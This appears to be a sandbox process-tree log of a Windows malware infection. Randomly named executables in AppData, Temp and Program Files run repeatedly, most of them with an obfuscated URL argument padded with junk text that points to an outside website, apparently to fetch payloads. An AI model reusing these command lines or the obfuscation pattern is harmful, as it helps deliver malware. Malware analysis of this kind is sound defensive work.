- C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E973D285-A13B-40F5-90D3-636D16F0AB18}\MicrosoftEdgeUpdateSetup_X86_1.3.177.11.exe
  "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E973D285-A13B-40F5-90D3-636D16F0AB18}\MicrosoftEdgeUpdateSetup_X86_1.3.177.11.exe" /update /sessionid "{DA7C49E8-3FC5-48B2-9A3C-FC7E8AC3B015}"
  2⤵
  PID:10060
- C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
  "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNzUuMjciIHNoZWxsX3ZlcnNpb249IjEuMy4xNzUuMjciIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7REE3QzQ5RTgtM0ZDNS00OEIyLTlBM0MtRkM3RThBQzNCMDE1fSIgdXNlcmlkPSJ7NzhDN0Q1NTMtNEI2Ni00RTEzLUI0QTctNDNGOUM2Mzc1RkQyfSIgaW5zdGFsbHNvdXJjZT0ic2NoZWR1bGVyIiByZXF1ZXN0aWQ9Ins0NEFBMzNBRS05Mzk3LTRGNDYtQjE2OC1EMDhFMzBFRjQ2NDl9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE5MDQxLjEyODgiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIiBpc19pbl9sb2NrZG93bl9tb2RlPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iREFEWSIgcHJvZHVjdF9uYW1lPSJTdGFuZGFyZCBQQyAoUTM1ICsgSUNIOSwgMjAwOSkiLz48ZXhwIGV0YWc9IiZxdW90O3FXSlN6V3dQZmRjTFIrWEdJdjZ4clpmaVlPeGhQVTJzMU5XbWpXY2FGUGc9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0ie0YzQzRGRTAwLUVGRDUtNDAzQi05NTY5LTM5OEEyMEYxQkE0QX0iIHZlcnNpb249IjEuMy4xNzUuMjciIG5leHR2ZXJzaW9uPSIxLjMuMTc3LjExIiBsYW5nPSIiIGJyYW5kPSJJTkJYIiBjbGllbnQ9IiIgZXhwZXJpbWVudHM9IlByb2R1Y3RzVG9SZWdpc3Rlcj0lN0JGMzAxNzIyNi1GRTJBLTQyOTUtOEJERi0wMEMzQTlBN0U0QzUlN0QiIGluc3RhbGxhZ2U9IjAiPjx1cGRhdGVjaGVjay8-PGV2ZW50IGV2ZW50dHlwZT0iMTIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjExMjYxNDY0NDUxIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iMTMiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjExMjYyNzE0NDEwIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iMTQiIGV2ZW50cmVzdWx0PSIwIiBlcnJvcmNvZGU9Ii0yMTQ3MDIzODM4IiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSIxNTM4NzAzNzA4NiIgc291cmNlX3VybF9pbmRleD0iMCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIgZG93bmxvYWRlcj0iZG8iIHVybD0iaHR0cDovL21zZWRnZS5iLnRsdS5kbC5kZWxpdmVyeS5tcC5taWNyb3NvZnQuY29tL2ZpbGVzdHJlYW1pbmdzZXJ2aWNlL2ZpbGVzL2U5YjQyNmI5LTA3ZjgtNGIyOS05MzVjLWQ5MWE1OWJiNzhiYT9QMT0xNjkwNDQzODg5JmFtcDtQMj00MDQmYW1wO1AzPTImYW1wO1A0PWRKS21SQzlMUHBDQXk1a0RVamk5UEVTQ1hldGVWTkhvMjhMcmE0JTJiYWx4biUyYlgyMlBzN3JMQ3NTRkx4S3FRWlFuNTdaeENLODBQR0N4MnhjNGNGaVdtdyUzZCUzZCIgc2VydmVyX2lwX2hpbnQ9IiIgY2RuX2NpZD0iLTEiIGNkbl9jY2M9IiIgY2RuX21zZWRnZV9yZWY9IiIgY2RuX2F6dXJlX3JlZl9vcmlnaW5fc2hpZWxkPSIiIGNkbl9jYWNoZT0iIiBjZG5fcDNwPSIiIGRvd25sb2FkZWQ9IjAiIHRvdGFsPSIwIiBkb3dubG9hZF90aW1lX21zPSIxNTciLz48ZXZlbnQgZXZlbnR0eXBlPSIxNCIgZXZlbnRyZXN1bHQ9IjAiIGVycm9yY29kZT0iLTIxNDMwOTI2ODciIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjE1Mzg3MDY3MTI3IiBzb3VyY2VfdXJsX2luZGV4PSIwIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIiBkb3dubG9hZGVyPSJiaXRzIiB1cmw9Imh0dHA6Ly9tc2VkZ2UuYi50bHUuZGwuZGVsaXZlcnkubXAubWljcm9zb2Z0LmNvbS9maWxlc3RyZWFtaW5nc2VydmljZS9maWxlcy9lOWI0MjZiOS0wN2Y4LTRiMjktOTM1Yy1kOTFhNTliYjc4YmE_UDE9MTY5MDQ0Mzg4OSZhbXA7UDI9NDA0JmFtcDtQMz0yJmFtcDtQND1kSkttUkM5TFBwQ0F5NWtEVWppOVBFU0NYZXRlVk5IbzI4THJhNCUyYmFseG4lMmJYMjJQczdyTENzU0ZMeEtxUVpRbjU3WnhDSzgwUEdDeDJ4YzRjRmlXbXclM2QlM2QiIHNlcnZlcl9pcF9oaW50PSIiIGNkbl9jaWQ9Ii0xIiBjZG5fY2NjPSIiIGNkbl9tc2VkZ2VfcmVmPSIiIGNkbl9henVyZV9yZWZfb3JpZ2luX3NoaWVsZD0iIiBjZG5fY2FjaGU9IiIgY2RuX3AzcD0iIiBkb3dubG9hZGVkPSIzMzUiIHRvdGFsPSIxNTk4OTQ0IiBkb3dubG9hZF90aW1lX21zPSI0MDk1MzgiLz48ZXZlbnQgZXZlbnR0eXBlPSIxNCIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iMTUzODcwODcxMTgiIHNvdXJjZV91cmxfaW5kZXg9IjAiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiIGRvd25sb2FkZXI9Indpbmh0dHAiIHVybD0iaHR0cDovL21zZWRnZS5iLnRsdS5kbC5kZWxpdmVyeS5tcC5taWNyb3NvZnQuY29tL2ZpbGVzdHJlYW1pbmdzZXJ2aWNlL2ZpbGVzL2U5YjQyNmI5LTA3ZjgtNGIyOS05MzVjLWQ5MWE1OWJiNzhiYT9QMT0xNjkwNDQzODg5JmFtcDtQMj00MDQmYW1wO1AzPTImYW1wO1A0PWRKS21SQzlMUHBDQXk1a0RVamk5UEVTQ1hldGVWTkhvMjhMcmE0JTJiYWx4biUyYlgyMlBzN3JMQ3NTRkx4S3FRWlFuNTdaeENLODBQR0N4MnhjNGNGaVdtdyUzZCUzZCIgc2VydmVyX2lwX2hpbnQ9IjcyLjIxLjgxLjIwMCIgY2RuX2NpZD0iMTEiIGNkbl9jY2M9IlVTIiBjZG5fbXNlZGdlX3JlZj0iUmVmIEE6IEFGNkFGNzU4Q0YwQTQxQ0M4RTEwREZEQjkyNjBDQTEyIFJlZiBCOiBFV1IzMTEwMDAxMDMwNDUgUmVmIEM6IDIwMjMtMDctMDFUMDA6Mjg6NTZaIiBjZG5fYXp1cmVfcmVmX29yaWdpbl9zaGllbGQ9IlJlZiBBOiAwMDIzNDdCNEVBRjE0NDI2OEQwMTlEMkJFRjczQUU3NyBSZWYgQjogTU5aMjIxMDYwNjA1MDA3IFJlZiBDOiAyMDIzLTA3LTAxVDAwOjI4OjU2WiIgY2RuX2NhY2hlPSJISVQiIGNkbl9wM3A9IiIgZG93bmxvYWRlZD0iMTU5ODk0NCIgdG90YWw9IjE1OTg5NDQiIGRvd25sb2FkX3RpbWVfbXM9IjE1MDYiLz48ZXZlbnQgZXZlbnR0eXBlPSIxNCIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iMTUzODcxMTY5NzIiIHNvdXJjZV91cmxfaW5kZXg9IjAiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSIxNSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iMTUzOTI3MDcxMDMiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiLz48cGluZyByPSIxNyIgcmQ9IjYwMjciIHBpbmdfZnJlc2huZXNzPSJ7QTRGMzIwQ0QtMzQ0RS00MUYyLUJFOUYtNTk2RDEwNTNGREM4fSIvPjwvYXBwPjxhcHAgYXBwaWQ9Ins1NkVCMThGOC1CMDA4LTRDQkQtQjZEMi04Qzk3RkU3RTkwNjJ9IiB2ZXJzaW9uPSI5Mi4wLjkwMi42NyIgbmV4dHZlcnNpb249IiIgbGFuZz0iIiBicmFuZD0iSU5CWCIgY2xpZW50PSIiIGV4cGVyaW1lbnRzPSJjb25zZW50PWZhbHNlIiBpc19waW5uZWRfc3lzdGVtPSJ0cnVlIiBsYXN0X2xhdW5jaF9jb3VudD0iMSIgbGFzdF9sYXVuY2hfdGltZT0iMTMzMzQzMTIzMTQwMDk5MjgwIj48dXBkYXRlY2hlY2svPjxwaW5nIGFjdGl2ZT0iMSIgYT0iLTEiIHI9IjE3IiBhZD0iLTEiIHJkPSI2MDI3IiBwaW5nX2ZyZXNobmVzcz0iezdDRDE0NTc1LTlDREEtNDY1Qi05RjgyLUY0OUQ0NEJFMjZBMX0iLz48L2FwcD48YXBwIGFwcGlkPSJ7RjMwMTcyMjYtRkUyQS00Mjk1LThCREYtMDBDM0E5QTdFNEM1fSIgdmVyc2lvbj0iMTE0LjAuMTgyMy44NiIgbmV4dHZlcnNpb249IiIgbGFuZz0iIiBicmFuZD0iR0dMUyIgY2xpZW50PSIiIGV4cGVyaW1lbnRzPSJjb25zZW50PWZhbHNlIiBpbnN0YWxsYWdlPSIwIiBpbnN0YWxsZGF0ZT0iNjA0MSIgbGFzdF9sYXVuY2hfY291bnQ9IjEiIGxhc3RfbGF1bmNoX3RpbWU9IjEzMzM0MzEyMzQ3NTY4ODg3MCI-PHVwZGF0ZWNoZWNrLz48cGluZyBhY3RpdmU9IjEiIGE9Ii0xIiByPSItMSIgYWQ9Ii0xIiByZD0iLTEiIHBpbmdfZnJlc2huZXNzPSJ7RjIyNjY5OTQtRTI1Ny00M0YxLThBMUItRUM1M0EyNUU0MENCfSIvPjwvYXBwPjwvcmVxdWVzdD4
  2⤵
  PID:684

C:\Program Files (x86)\Caret\gridding.exe
"C:\Program Files (x86)\Caret\gridding.exe"
1⤵
PID:7184

C:\Users\Admin\AppData\Local\unproductive.exe
C:\Users\Admin\AppData\Local\unproductive.exe
1⤵
PID:3020

C:\Users\Admin\AppData\Local\hcf.exe
C:\Users\Admin\AppData\Local\hcf.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:8296
- C:\Users\Admin\AppData\Local\Temp\nsr6676.tmp\Ceaseless.exe
  C:\Users\Admin\AppData\Local\Temp\nsr6676.tmp\Ceaseless.exe ""tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB""
  2⤵
  PID:8416

C:\Program Files (x86)\havre\Lashing.exe
"C:\Program Files (x86)\havre\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:6172

C:\Program Files (x86)\Neurobiological\conveyances.exe
"C:\Program Files (x86)\Neurobiological\conveyances.exe"
1⤵
PID:8100

C:\Users\Admin\AppData\Local\Ceaseless.exe
C:\Users\Admin\AppData\Local\Ceaseless.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:8380

C:\Program Files (x86)\Neurobiological\Ceaseless.exe
"C:\Program Files (x86)\Neurobiological\Ceaseless.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:5660

C:\Program Files (x86)\havre\Lashing.exe
"C:\Program Files (x86)\havre\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:7020
- C:\Program Files (x86)\Microsoft\EdgeWebView\Application\114.0.1823.86\msedgewebview2.exe
  "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\114.0.1823.86\msedgewebview2.exe" --embedded-browser-webview=1 --webview-exe-name=Lashing.exe --webview-exe-version=1.0.0.0 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\tim110\EBWebView" --noerrdialogs --embedded-browser-webview-dpi-awareness=0 --disable-features=MojoIpcz --mojo-named-platform-channel-pipe=7020.8472.17157079777147019668
  2⤵
  PID:2496
- - C:\Program Files (x86)\Microsoft\EdgeWebView\Application\114.0.1823.86\msedgewebview2.exe
    "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\114.0.1823.86\msedgewebview2.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\tim110\EBWebView /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\tim110\EBWebView\Crashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=114.0.5735.201 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeWebView\Application\114.0.1823.86\msedgewebview2.exe" --annotation=plat=Win64 "--annotation=prod=Edge WebView2" --annotation=ver=114.0.1823.86 --initial-client-data=0x168,0x16c,0x170,0x144,0x1bc,0x7ffe21264210,0x7ffe21264220,0x7ffe21264230
    3⤵
    PID:6516
- C:\Program Files (x86)\Microsoft\EdgeWebView\Application\114.0.1823.86\msedgewebview2.exe
  "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\114.0.1823.86\msedgewebview2.exe" --embedded-browser-webview=1 --webview-exe-name=Lashing.exe --webview-exe-version=1.0.0.0 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\tim110\EBWebView" --noerrdialogs --embedded-browser-webview-dpi-awareness=0 --disable-features=MojoIpcz --mojo-named-platform-channel-pipe=7020.8472.16926636488022246704
  2⤵
  PID:4308

C:\Users\Admin\AppData\Local\hcf.exe
C:\Users\Admin\AppData\Local\hcf.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:1264
- C:\Users\Admin\AppData\Local\Temp\nsd9E10.tmp\Ceaseless.exe
  C:\Users\Admin\AppData\Local\Temp\nsd9E10.tmp\Ceaseless.exe ""tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB""
  2⤵
  PID:8272

C:\Users\Admin\AppData\Roaming\sefanathread\sefanathread.exe
C:\Users\Admin\AppData\Roaming\sefanathread\sefanathread.exe
1⤵
PID:5148

C:\Users\Admin\AppData\Local\unproductive.exe
C:\Users\Admin\AppData\Local\unproductive.exe
1⤵
PID:5484

C:\Users\Admin\AppData\Local\Ceaseless.exe
C:\Users\Admin\AppData\Local\Ceaseless.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:9524

C:\Users\Admin\AppData\Local\Lashing.exe
C:\Users\Admin\AppData\Local\Lashing.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:9564

C:\Program Files (x86)\Neurobiological\conveyances.exe
"C:\Program Files (x86)\Neurobiological\conveyances.exe"
1⤵
PID:9656

C:\Program Files (x86)\Sewer\Ceaseless.exe
"C:\Program Files (x86)\Sewer\Ceaseless.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:10032

C:\Program Files (x86)\Sewer\Lashing.exe
"C:\Program Files (x86)\Sewer\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:9204

C:\Users\Admin\AppData\Local\Ceaseless.exe
C:\Users\Admin\AppData\Local\Ceaseless.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:9096

C:\Program Files (x86)\havre\Lashing.exe
"C:\Program Files (x86)\havre\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:6392

C:\Program Files (x86)\Caret\gridding.exe
"C:\Program Files (x86)\Caret\gridding.exe"
1⤵
PID:8292

C:\Users\Admin\AppData\Local\Ceaseless.exe
C:\Users\Admin\AppData\Local\Ceaseless.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:7060

C:\Program Files (x86)\Neurobiological\conveyances.exe
"C:\Program Files (x86)\Neurobiological\conveyances.exe"
1⤵
PID:7136

C:\Users\Admin\AppData\Local\unproductive.exe
C:\Users\Admin\AppData\Local\unproductive.exe
1⤵
PID:2388

C:\Program Files (x86)\havre\Lashing.exe
"C:\Program Files (x86)\havre\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:3396

C:\Users\Admin\AppData\Local\hcf.exe
C:\Users\Admin\AppData\Local\hcf.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:5880
- C:\Users\Admin\AppData\Local\Temp\nsj285A.tmp\Ceaseless.exe
  C:\Users\Admin\AppData\Local\Temp\nsj285A.tmp\Ceaseless.exe ""tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB""
  2⤵
  PID:6452

C:\Users\Admin\AppData\Local\hcf.exe
C:\Users\Admin\AppData\Local\hcf.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:4524
- C:\Users\Admin\AppData\Local\Temp\nsgA1C5.tmp\Ceaseless.exe
  C:\Users\Admin\AppData\Local\Temp\nsgA1C5.tmp\Ceaseless.exe ""tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB""
  2⤵
  PID:9492

C:\Users\Admin\AppData\Local\unproductive.exe
C:\Users\Admin\AppData\Local\unproductive.exe
1⤵
PID:10084

C:\Program Files (x86)\Neurobiological\conveyances.exe
"C:\Program Files (x86)\Neurobiological\conveyances.exe"
1⤵
PID:5512

C:\Users\Admin\AppData\Local\Ceaseless.exe
C:\Users\Admin\AppData\Local\Ceaseless.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:5872

C:\Program Files (x86)\havre\Lashing.exe
"C:\Program Files (x86)\havre\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:10148

C:\Program Files (x86)\Caret\gridding.exe
"C:\Program Files (x86)\Caret\gridding.exe"
1⤵
PID:3868

C:\Program Files (x86)\Neurobiological\conveyances.exe
"C:\Program Files (x86)\Neurobiological\conveyances.exe"
1⤵
PID:3192

C:\Users\Admin\AppData\Local\Ceaseless.exe
C:\Users\Admin\AppData\Local\Ceaseless.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:5328

C:\Users\Admin\AppData\Local\hcf.exe
